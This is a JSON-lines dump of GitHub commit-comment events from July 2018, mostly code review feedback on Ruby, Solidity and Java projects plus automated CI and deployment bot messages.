{"id":"7985863991","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756894,"position":4,"line":4,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:41:54Z","updated_at":"2018-07-18T22:41:54Z","author_association":"NONE","body":"И что chomp можно не писать я уже писал"}},"created_at":"2018-07-18T22:41:54Z"}
{"id":"7985864227","type":"CommitCommentEvent","actor":{"login":"ScottehBoeh"},"repo":{"name":"MinecraftForge/MCPConfig"},"payload":{"comment":{"id":29756895,"position":null,"line":null,"path":null,"commit_id":"e161229b4a19663dc59db608bda61c35c128e51f","created_at":"2018-07-18T22:41:59Z","updated_at":"2018-07-18T22:41:59Z","author_association":"NONE","body":"This makes me very happy."}},"created_at":"2018-07-18T22:41:59Z"}
{"id":"7985864580","type":"CommitCommentEvent","actor":{"login":"djlampert"},"repo":{"name":"djlampert/PyHSPF"},"payload":{"comment":{"id":29756896,"position":null,"line":null,"path":null,"commit_id":"268a5e05666b9a5c12abb8b4197c7f58548bf35c","created_at":"2018-07-18T22:42:06Z","updated_at":"2018-07-18T22:42:06Z","author_association":"OWNER","body":"climateprocessor.py—lines 424-426. Why delete the metadata file?\r\n\r\nclimateprocessor.py—lines 522. Looks like the print statement should be removed.\r\n"}},"created_at":"2018-07-18T22:42:06Z"}
{"id":"7985865742","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756899,"position":12,"line":12,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:42:27Z","updated_at":"2018-07-18T22:42:27Z","author_association":"NONE","body":"Настрой редактор на отступ ровно в 2 пробела, именно так принято в ruby. Причем, именно пробела, а не таба. Т.е. должна быть замена табов на пробелы, т.н. soft tabs. Найди в интернете как сделать soft tabs для твоего редактора"}},"created_at":"2018-07-18T22:42:27Z"}
{"id":"7985867269","type":"CommitCommentEvent","actor":{"login":"RX14"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29756903,"position":null,"line":null,"path":null,"commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-18T22:42:55Z","updated_at":"2018-07-18T22:42:55Z","author_association":"NONE","body":"You'll update the version number in a PR, and if you forget to update the specs CI will fail. Thats two places to update the number but CI will enforce that. Who cares."}},"created_at":"2018-07-18T22:42:55Z"}
{"id":"7985872321","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29756916,"position":12,"line":10,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"3307bd7c8bc54e1ba9a95925789a15e2168f0a54","created_at":"2018-07-18T22:44:27Z","updated_at":"2018-07-18T22:44:27Z","author_association":"NONE","body":"THere is a style habit with purpose that will become clear over time. Make these event logs chronical the inputs that caused the changes rather than the new state after the change. This may seem counter-intuitive but the current state is easily inspectable. Event logs should create a history of the changes that unfolded so that a software client could, in theory, reconstruct the \"history of the state\" and _why_, if it wanted to. \r\n\r\nIn this style, there will be a strong correspondence between the state-changing function inputs and the event logs. Consider naming the event logs in a way that makes it obvious that it corresponds to a particular function and lay out the variables so it all matches up nicely. \r\n\r\nExample:\r\n\r\n`event LogSpitFunds(address sender, uint amount, address receiver1, address receiver2);`"}},"created_at":"2018-07-18T22:44:27Z"}
{"id":"7985872383","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756917,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T22:44:28Z","updated_at":"2018-07-18T22:44:28Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-18T22:44:28Z"}
{"id":"7985873406","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29756924,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-18T22:44:48Z","updated_at":"2018-07-18T22:44:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-18T22:44:48Z"}
{"id":"7985874313","type":"CommitCommentEvent","actor":{"login":"Kiani92"},"repo":{"name":"Kiani92/Masoud-"},"payload":{"comment":{"id":29756927,"position":null,"line":null,"path":null,"commit_id":"86b4dc56a3ddc9f50bc43d8c37fe5d4e3a63d47f","created_at":"2018-07-18T22:45:06Z","updated_at":"2018-07-18T22:45:06Z","author_association":"OWNER","body":" 86b4dc5"}},"created_at":"2018-07-18T22:45:06Z"}
{"id":"7985876537","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29756935,"position":20,"line":13,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"3307bd7c8bc54e1ba9a95925789a15e2168f0a54","created_at":"2018-07-18T22:45:46Z","updated_at":"2018-07-18T22:45:46Z","author_association":"NONE","body":"This Splitter is a nice and simple \"main\" contract and this can be a good time to think about re-usable code and explore inheritance. \r\n\r\nConsider\r\n\r\n`contract Splitter is Owned { ...`\r\n\r\n"}},"created_at":"2018-07-18T22:45:46Z"}
{"id":"7985877117","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29756937,"position":null,"line":null,"path":null,"commit_id":"6070d4cf2b0e3925c37b928b336e8101124ea41b","created_at":"2018-07-18T22:45:57Z","updated_at":"2018-07-18T22:45:57Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-807](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-807).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-807-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-18T22:45:57Z"}
{"id":"7985878029","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29756941,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-18T22:46:14Z","updated_at":"2018-07-18T22:46:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-18T22:46:14Z"}
{"id":"7985881582","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29756949,"position":56,"line":64,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"3307bd7c8bc54e1ba9a95925789a15e2168f0a54","created_at":"2018-07-18T22:47:21Z","updated_at":"2018-07-18T22:47:21Z","author_association":"NONE","body":"`selfdestruct` is a terrible idea most of the time. You might consider, instead, an emergency stop system and only the owner is allowed to use it. \r\n\r\nAs part of your exploration of re-usable code and inheritance, consider\r\n\r\n`contract Splitter is Pausable { ...`\r\n\r\nand \r\n\r\n`contract Pausable is Owned { ...`\r\n"}},"created_at":"2018-07-18T22:47:21Z"}
{"id":"7985882479","type":"CommitCommentEvent","actor":{"login":"JakubMrozek"},"repo":{"name":"honzajavorek/cojeapi"},"payload":{"comment":{"id":29756952,"position":null,"line":null,"path":null,"commit_id":"70d1e703382c92b4a13c7e80810c8c5d550d17c0","created_at":"2018-07-18T22:47:38Z","updated_at":"2018-07-18T22:47:38Z","author_association":"NONE","body":"Absolutně nechápu, proč se commity nedají lajkovat!!! 😡"}},"created_at":"2018-07-18T22:47:38Z"}
{"id":"7985887361","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29756963,"position":null,"line":null,"path":null,"commit_id":"72e35592a8e7135ded8c2a1c6ba0a5442914c743","created_at":"2018-07-18T22:49:08Z","updated_at":"2018-07-18T22:49:08Z","author_association":"COLLABORATOR","body":"Correct respawn time is 900 seconds."}},"created_at":"2018-07-18T22:49:08Z"}
{"id":"7985887633","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29756964,"position":null,"line":null,"path":null,"commit_id":"ed63186475db8b3b465dec94effeeac77362134b","created_at":"2018-07-18T22:49:13Z","updated_at":"2018-07-18T22:49:13Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-search](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-search).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-search-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-18T22:49:13Z"}
{"id":"7985888421","type":"CommitCommentEvent","actor":{"login":"lerobto"},"repo":{"name":"MylesIsCool/ViaVersion"},"payload":{"comment":{"id":29756967,"position":null,"line":null,"path":null,"commit_id":"d0230af5c91b92e26b00dca4bf428680dac34a75","created_at":"2018-07-18T22:49:27Z","updated_at":"2018-07-18T22:49:27Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-18T22:49:27Z"}
{"id":"7985888595","type":"CommitCommentEvent","actor":{"login":"ErisvaldoCorreia"},"repo":{"name":"KelvinVCosta/Udacity"},"payload":{"comment":{"id":29756968,"position":null,"line":null,"path":null,"commit_id":"9c7cd9229be9b34db6c41d1fe9ab38506c257263","created_at":"2018-07-18T22:49:30Z","updated_at":"2018-07-18T22:49:30Z","author_association":"NONE","body":"Good work Friend! "}},"created_at":"2018-07-18T22:49:30Z"}
{"id":"7985888617","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756969,"position":1,"line":1,"path":"jitpack.yml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:49:31Z","updated_at":"2018-07-18T22:49:31Z","author_association":"NONE","body":"This is for serving MoreEnchantables as a maven repo on jitpack, not for importing dependencies, so it can be added without harm, but is not strictly needed either."}},"created_at":"2018-07-18T22:49:31Z"}
{"id":"7985888659","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756970,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:49:31Z","updated_at":"2018-07-18T22:49:31Z","author_association":"OWNER","body":"This isn't awful, but generally you should try to avoid catching Exception. Handling each exception individually allows you to do both better error handling and better error handling. It also keeps some other weird / bad unforseen exceptions from sliding through unnoticed. For example here, the only 2 types of exceptions I could see are a NullPointerException if `items` doesn't exist or an IllegalArgumentException if a given material doesnt exist.\r\n\r\nIn the first case the user will get an error message about a null pointer which doesnt really tell him what's wrong (going back to the previous comment, you should just check for null instead of catching this)\r\n\r\nIn the second case, even a single misspelled material will completly break the entire list. Much more stable behavior would be to catch just the IAE around the material parsing and if it is thrown print specifically what went wrong and skip only that item."}},"created_at":"2018-07-18T22:49:31Z"}
{"id":"7985891005","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756978,"position":12,"line":12,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:50:15Z","updated_at":"2018-07-18T22:50:15Z","author_association":"NONE","body":"Мы хотим по возможности избегать вложенных условий. Желательно, иметь 1 уровень вложенности. Это упрощает чтение кода, потому-что не нужно помнить лишний контекст. Давай этот частный случай вытащим  выше, что-б все остальные вычисления не происходили в ветке else"}},"created_at":"2018-07-18T22:50:15Z"}
{"id":"7985891243","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756979,"position":69,"line":69,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:50:19Z","updated_at":"2018-07-18T22:50:19Z","author_association":"OWNER","body":"Exact same thing for this try catch, Enchantment parsing can also throw an IAE"}},"created_at":"2018-07-18T22:50:19Z"}
{"id":"7985895121","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756989,"position":52,"line":52,"path":"pom.xml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:51:32Z","updated_at":"2018-07-18T22:51:32Z","author_association":"NONE","body":"Better to use 1.6.2\r\n\r\n[CivModCore pom.xml](https://github.com/CivClassic/CivModCore/blob/9b5afd1ea5700b77ab73fad8adcce37763c537a8/pom.xml#L7)"}},"created_at":"2018-07-18T22:51:32Z"}
{"id":"7985896401","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756993,"position":15,"line":15,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:51:57Z","updated_at":"2018-07-18T22:51:57Z","author_association":"NONE","body":"Тут с индентацией не то. У нас должно быть 2 пробела. И не нужно оставлять пустые строки перед и после else/elsif\r\n```\r\nif something\r\n  do_something\r\nelse\r\n  do_something_else\r\nend\r\n```"}},"created_at":"2018-07-18T22:51:57Z"}
{"id":"7985897313","type":"CommitCommentEvent","actor":{"login":"lmoresi"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29756997,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T22:52:11Z","updated_at":"2018-07-18T22:52:11Z","author_association":"CONTRIBUTOR","body":"\r\nThe beauty of evolutionary design patterns !!\r\n\r\nSent from my iPhone\r\n\r\nOn 18 Jul 2018, at 15:21, jmansour <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\nIt's probably not necessary here, although you'd have to update 192 to grab the fn off the force vec. In some places (if I recall correctly) we need to do this to ensure we retain a reference to the object, else Python goes ahead and destroys them (as it is unaware they are being used in the C layer).\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/underworldcode/underworld2/commit/c1bd01df5b4115a4e95c4a367be1d1da40d6954b#commitcomment-29756652>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AMAXo97m-m-drtzfJAx-VaI3C5BolnKCks5uH7TGgaJpZM4VUgcq>.\r\n"}},"created_at":"2018-07-18T22:52:11Z"}
{"id":"7985897362","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756998,"position":14,"line":14,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:52:13Z","updated_at":"2018-07-18T22:52:13Z","author_association":"NONE","body":"Про конкатенацию писал"}},"created_at":"2018-07-18T22:52:13Z"}
{"id":"7985897486","type":"CommitCommentEvent","actor":{"login":"fredrikekre"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29756999,"position":11,"line":341,"path":"base/client.jl","commit_id":"fbc30cd6c744c8cef82cb6fd54d10bdce9b36692","created_at":"2018-07-18T22:52:16Z","updated_at":"2018-07-18T22:52:16Z","author_association":"CONTRIBUTOR","body":"I guess this is why the [Pkg README.md instructions](https://github.com/JuliaLang/Pkg.jl/blob/master/README.md) for loading the development version of Pkg does not work anymore, which is unfortunate. Any workaround?"}},"created_at":"2018-07-18T22:52:16Z"}
{"id":"7985898546","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757001,"position":17,"line":17,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:52:37Z","updated_at":"2018-07-18T22:52:37Z","author_association":"NONE","body":"пробелы вокруг умножения"}},"created_at":"2018-07-18T22:52:37Z"}
{"id":"7985899096","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757007,"position":18,"line":18,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:52:48Z","updated_at":"2018-07-18T22:52:48Z","author_association":"NONE","body":"конкатенация"}},"created_at":"2018-07-18T22:52:48Z"}
{"id":"7985899783","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757009,"position":19,"line":19,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:53:00Z","updated_at":"2018-07-18T22:53:00Z","author_association":"NONE","body":"пробелы вокруг <"}},"created_at":"2018-07-18T22:53:00Z"}
{"id":"7985901840","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29757015,"position":null,"line":null,"path":null,"commit_id":"bda1957cfaef08bf2f5c5971c4dc9077e0ccdc37","created_at":"2018-07-18T22:53:39Z","updated_at":"2018-07-18T22:53:39Z","author_association":"COLLABORATOR","body":"1) Isn’t this point slightly redundant as the FPGA does this for us, and is the black box we have to connect to on the LWA-SV correlator? So in practice we don’t have to do the conversion ourselves?\n2) Hmm that’s kinda odd, I would of thought that a reduction operation would be fairly quick, however the memory bandwidth might have slowed it down.\n3) I will do this, I’ve been kind of flying by the seat of my pants. I was waiting for you to finish up and my idea was to tidy everything up and make it a bit more robust. I am also keen to implement a unit test/benchmarking mode as well, which I’ll get started on.\n\n\n\n> On 18 Jul 2018, at 15:20, jaycedowell <notifications@github.com> wrote:\n> \n> A couple of other notes:\n> \n> The conversion from cf32 to ci4 in FDomainOp may be sub-optimal, i.e., lots of clipping in the ci4 data. It's hard to tell from casual inspection because I'm not fluent in packed ci4.\n> I tried accumulating the images in MOFFCorrelatorOp but ended up with bad performance so I dropped it. My approach was to use a transpose+matmul() to get the accumulation and all of the polarization products at once.\n> We should really consider adding in the ProcLog information into the blocks that do not have it so that we can get a better idea of performance.\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/bda1957cfaef08bf2f5c5971c4dc9077e0ccdc37#commitcomment-29756642>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hPCg-7idSEl4Nh74rVVdDZiFit1Rks5uH7STgaJpZM4VVdZP>.\n> \n\n"}},"created_at":"2018-07-18T22:53:39Z"}
{"id":"7985905767","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757022,"position":22,"line":22,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:54:55Z","updated_at":"2018-07-18T22:54:55Z","author_association":"NONE","body":"проверь формулы. Тут почему-то деление вместо умножения."}},"created_at":"2018-07-18T22:54:55Z"}
{"id":"7985905855","type":"CommitCommentEvent","actor":{"login":"Charly6596"},"repo":{"name":"Charly6596/Community-Discord-BOT"},"payload":{"comment":{"id":29757023,"position":4,"line":30,"path":"CommunityBot/Global.cs","commit_id":"b559f3847d1df20b497ae45eb78581fa4f26d808","created_at":"2018-07-18T22:54:56Z","updated_at":"2018-07-18T22:54:56Z","author_association":"OWNER","body":"Making the Logger class a Singleton, and using it with Dependency Injection, will avoid the use of this Global variable"}},"created_at":"2018-07-18T22:54:56Z"}
{"id":"7985906745","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757024,"position":27,"line":27,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:55:13Z","updated_at":"2018-07-18T22:55:13Z","author_association":"NONE","body":"и тут формулы не те"}},"created_at":"2018-07-18T22:55:13Z"}
{"id":"7985907172","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29757025,"position":null,"line":null,"path":null,"commit_id":"fe1e4e8a28c77565111b13fd889e8331cf47a813","created_at":"2018-07-18T22:55:21Z","updated_at":"2018-07-18T22:55:21Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-search](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-search).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-search-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-18T22:55:21Z"}
{"id":"7985908404","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757028,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:55:45Z","updated_at":"2018-07-18T22:55:45Z","author_association":"NONE","body":"This should be factored into `PlayerEnchantmentOffers` like `PlayerEnchantmentOffers.getFor(player)` which will return a fresh one if needed. Otherwise, `PlayerEnchantmentOffers` is exactly a map that doesn't implement the interface, which doesn't help anything."}},"created_at":"2018-07-18T22:55:45Z"}
{"id":"7985908901","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757029,"position":22,"line":22,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:55:55Z","updated_at":"2018-07-18T22:55:55Z","author_association":"NONE","body":"Нужно, чтобы не было красной стрелки, которую показывает Github в конце строки.  для этого найди для своего редактора как настроить автодобавление пустой строки в конце файла."}},"created_at":"2018-07-18T22:55:55Z"}
{"id":"7985909878","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757034,"position":78,"line":78,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:56:13Z","updated_at":"2018-07-18T22:56:13Z","author_association":"NONE","body":"Same as `PlayerEnchantmentOffers`"}},"created_at":"2018-07-18T22:56:13Z"}
{"id":"7985910414","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757036,"position":10,"line":10,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConfigItemEnchantments.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:56:23Z","updated_at":"2018-07-18T22:56:23Z","author_association":"OWNER","body":"This works fine, but still worth mentioning:\r\n\r\nYou had the right idea here that you should encapsulate the functionality in its own class, but you should achieve it through composition instead of inheritance. The way you did it here, the resulting objects also have all methods that Map has (put, clear, get etc.) and you kind of violate the encapsulation you created. Instead of encapsulating the behavior behind this class, you just add a few convenience methods to an existing class, creating kind of a weird anti-pattern. Much better would have been having the map as an internal attribute of this class, so it can only be accessed through the methods defined by you.\r\n\r\nSemi-related: https://en.wikipedia.org/wiki/Composition_over_inheritance"}},"created_at":"2018-07-18T22:56:23Z"}
{"id":"7985911077","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757037,"position":72,"line":72,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:56:35Z","updated_at":"2018-07-18T22:56:35Z","author_association":"NONE","body":"This case should be caught in `getFor`"}},"created_at":"2018-07-18T22:56:35Z"}
{"id":"7985911294","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757038,"position":3,"line":3,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:56:40Z","updated_at":"2018-07-18T22:56:40Z","author_association":"NONE","body":"Стороны могут быть не целыми\r\n"}},"created_at":"2018-07-18T22:56:40Z"}
{"id":"7985911487","type":"CommitCommentEvent","actor":{"login":"hoshsadiq"},"repo":{"name":"hoshsadiq/adblock-nocoin-list"},"payload":{"comment":{"id":29757039,"position":6,"line":260,"path":"nocoin.txt","commit_id":"d4d06d301eac48ab13bce744b59819b3907dd4ee","created_at":"2018-07-18T22:56:45Z","updated_at":"2018-07-18T22:56:45Z","author_association":"OWNER","body":"Aah! My bad. I've deleted it now."}},"created_at":"2018-07-18T22:56:45Z"}
{"id":"7985911845","type":"CommitCommentEvent","actor":{"login":"LRV"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29757040,"position":null,"line":null,"path":null,"commit_id":"e5b030afbfa1714763f640b36509230230ec0c1f","created_at":"2018-07-18T22:56:51Z","updated_at":"2018-07-18T22:56:51Z","author_association":"NONE","body":"Why isn't this added to 2.1, i manual added it to 2.1.14 ad works fine"}},"created_at":"2018-07-18T22:56:51Z"}
{"id":"7985913284","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757042,"position":10,"line":10,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:57:19Z","updated_at":"2018-07-18T22:57:19Z","author_association":"NONE","body":"лучше использовать && и || вместо and и or "}},"created_at":"2018-07-18T22:57:19Z"}
{"id":"7985915788","type":"CommitCommentEvent","actor":{"login":"ayavorsk"},"repo":{"name":"ayavorsk/Studying-QT"},"payload":{"comment":{"id":29757045,"position":null,"line":null,"path":null,"commit_id":"27d7374f5c1c2cf4c8f0f9836c6ce38eab4d3d68","created_at":"2018-07-18T22:58:06Z","updated_at":"2018-07-18T22:58:06Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-18T22:58:06Z"}
{"id":"7985916143","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757047,"position":77,"line":77,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConfigItemEnchantments.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:58:12Z","updated_at":"2018-07-18T22:58:12Z","author_association":"OWNER","body":"Throws a NPE if `getEnchantmentsForItem(itemMaterial)` returns null"}},"created_at":"2018-07-18T22:58:12Z"}
